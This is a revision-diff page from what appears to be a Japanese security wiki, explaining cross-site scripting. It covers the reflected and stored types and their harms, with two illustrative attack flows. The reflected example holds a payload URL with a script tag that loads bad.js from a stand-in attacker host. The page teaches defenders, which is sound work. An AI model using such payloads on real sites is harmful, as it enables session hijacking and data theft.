「XSS」の版間の差分
提供: セキュリティ
(ページの作成:「XSS は、 Cross Site Scripting の略です。 読み方 :XSS ::えっくすえすえす :Cross Site Scripting ::クロスサイトスクリプティング __TOC__ ...」) |
細 |
||
| 行1: | 行1: | ||
| − | XSS は、 Cross Site Scripting | + | [[XSS]] は、 Cross Site Scripting の略です。悪意ある第三者が[[JavaScript]]をページのクエリや[[CGM]](掲示板など)のコメントとして書き込み、ウェブページに悪意ある[[JavaScript]]を埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。 |
読み方 | 読み方 | ||
2013年5月6日 (月) 01:38時点における版
XSS は、 Cross Site Scripting の略です。悪意ある第三者がJavaScriptをページのクエリやCGM(掲示板など)のコメントとして書き込み、ウェブページに悪意あるJavaScriptを埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。
読み方
- XSS
- えっくすえすえす
- Cross Site Scripting
- クロスサイトスクリプティング
概要
以下のタイプが存在します。
- 折り返し型 XSS ( Reflected XSS )
- フィッシングメール、攻撃用 Web サーバの利用
- 蓄積型 XSS (Stored XSS)
- SNS, 掲示板、ブログ
被害
JavaScript で実現可能なこと範囲で、被害を受ける。
例
- Cookie の漏洩
- 情報漏えい
- Web ページの改ざん
- マルウェアの感染
- 別のサイトへの誘導
Reflected XSS
-
http://example.com/?id=<script src="http://eval.com/bad.js"></script>
へユーザを送り込む。 - ユーザが example.com にアクセスすると、 example.com は、 id の値をそのままエコーバックする。
- example.com のページは、 eval.com/bad.js をロードし、 example.com の権限で実行される。
Stored XSS
- 掲示板に「悪意のあるスクリプト」を書き込む。
- <script>
- 悪意のあるスクリプト
- </script>
- その掲示板に第三者がアクセスする。
- 「悪意のあるスクリプト」を含む HTML ページがロードされる。
- 第三者のブラウザで、「悪意のあるスクリプト」が実行される。